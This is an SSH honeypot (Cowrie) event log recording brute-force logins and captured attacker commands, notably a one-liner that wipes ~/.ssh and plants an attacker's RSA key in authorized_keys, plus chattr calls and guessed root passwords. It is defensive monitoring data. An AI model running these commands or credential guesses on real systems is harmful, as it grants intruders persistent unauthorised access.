{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:01.286219Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:29:01.827692Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:29:01.828558Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:29:02.092278Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:02.093395Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":49582,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c0bc93db607","protocol":"ssh","message":"New connection: 68.183.87.241:49582 (1.2.3.4:22) [session: 0c0bc93db607]","sensor":"my-vps","timestamp":"2025-08-26T04:29:02.354882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:02.356041Z","src_ip":"68.183.87.241","session":"0c0bc93db607"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:02.626792Z","src_ip":"68.183.87.241","session":"0c0bc93db607"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:29:03.750710Z","src_ip":"68.183.87.241","session":"0c0bc93db607"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:05.024166Z","src_ip":"68.183.87.241","session":"0c0bc93db607"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":52130,"dst_ip":"1.2.3.4","dst_port":22,"session":"92f2571f9393","protocol":"ssh","message":"New connection: 68.183.87.241:52130 (1.2.3.4:22) [session: 92f2571f9393]","sensor":"my-vps","timestamp":"2025-08-26T04:29:05.298502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:05.299493Z","src_ip":"68.183.87.241","session":"92f2571f9393"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:05.553842Z","src_ip":"68.183.87.241","session":"92f2571f9393"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:29:06.653799Z","src_ip":"68.183.87.241","session":"92f2571f9393"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:06.930182Z","src_ip":"68.183.87.241","session":"92f2571f9393"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:06.936522Z","src_ip":"68.183.87.241","session":"709469a1e5e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42118,"dst_ip":"1.2.3.4","dst_port":22,"session":"beb92c3eb1e2","protocol":"ssh","message":"New connection: 212.227.235.229:42118 (1.2.3.4:22) [session: beb92c3eb1e2]","sensor":"my-vps","timestamp":"2025-08-26T04:29:22.356375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:22.357915Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:22.626093Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.login.success","username":"root","password":"#qlalf#wiseit#qjsgh#","message":"login attempt [root/#qlalf#wiseit#qjsgh#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:29:23.737471Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:29:24.324705Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:29:24.325411Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:29:24.326201Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:24.595136Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:29:25.150174Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.150948Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.421154Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.422241Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34986,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cba76cee2b7","protocol":"ssh","message":"New connection: 212.227.235.229:34986 (1.2.3.4:22) [session: 8cba76cee2b7]","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.690498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.691727Z","src_ip":"212.227.235.229","session":"8cba76cee2b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:25.960527Z","src_ip":"212.227.235.229","session":"8cba76cee2b7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:29:27.077779Z","src_ip":"212.227.235.229","session":"8cba76cee2b7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:28.349597Z","src_ip":"212.227.235.229","session":"8cba76cee2b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34990,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f47159f900c","protocol":"ssh","message":"New connection: 212.227.235.229:34990 (1.2.3.4:22) [session: 7f47159f900c]","sensor":"my-vps","timestamp":"2025-08-26T04:29:28.615737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:28.616675Z","src_ip":"212.227.235.229","session":"7f47159f900c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:28.884065Z","src_ip":"212.227.235.229","session":"7f47159f900c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:29:29.995936Z","src_ip":"212.227.235.229","session":"7f47159f900c"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:30.265167Z","src_ip":"212.227.235.229","session":"beb92c3eb1e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:30.266077Z","src_ip":"212.227.235.229","session":"7f47159f900c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36588,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1f6919452a9","protocol":"ssh","message":"New connection: 212.227.235.229:36588 (1.2.3.4:22) [session: b1f6919452a9]","sensor":"my-vps","timestamp":"2025-08-26T04:29:45.753572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:29:45.754603Z","src_ip":"212.227.235.229","session":"b1f6919452a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:29:45.830034Z","src_ip":"212.227.235.229","session":"b1f6919452a9"}
{"eventid":"cowrie.login.failed","username":"asag","password":"asag123","message":"login attempt [asag/asag123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:29:46.172202Z","src_ip":"212.227.235.229","session":"b1f6919452a9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:29:47.250483Z","src_ip":"212.227.235.229","session":"b1f6919452a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47756,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c02fd0abfb4","protocol":"ssh","message":"New connection: 212.227.235.229:47756 (1.2.3.4:22) [session: 9c02fd0abfb4]","sensor":"my-vps","timestamp":"2025-08-26T04:30:00.576820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:00.577912Z","src_ip":"212.227.235.229","session":"9c02fd0abfb4"}
{"eventid":"cowrie.session.connect","src_ip":"3.131.215.38","src_port":46480,"dst_ip":"1.2.3.4","dst_port":23,"session":"12da494b3e96","protocol":"telnet","message":"New connection: 3.131.215.38:46480 (1.2.3.4:23) [session: 12da494b3e96]","sensor":"my-vps","timestamp":"2025-08-26T04:30:00.603666Z"}
{"eventid":"cowrie.session.closed","duration":0.0012657642364501953,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:00.604856Z","src_ip":"3.131.215.38","session":"12da494b3e96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:00.853876Z","src_ip":"212.227.235.229","session":"9c02fd0abfb4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12qwaszx","message":"login attempt [admin/12qwaszx] failed","sensor":"my-vps","timestamp":"2025-08-26T04:30:01.994936Z","src_ip":"212.227.235.229","session":"9c02fd0abfb4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:03.272679Z","src_ip":"212.227.235.229","session":"9c02fd0abfb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49796,"dst_ip":"1.2.3.4","dst_port":22,"session":"dadc967a6153","protocol":"ssh","message":"New connection: 212.227.235.229:49796 (1.2.3.4:22) [session: dadc967a6153]","sensor":"my-vps","timestamp":"2025-08-26T04:30:03.829210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:03.830325Z","src_ip":"212.227.235.229","session":"dadc967a6153"}
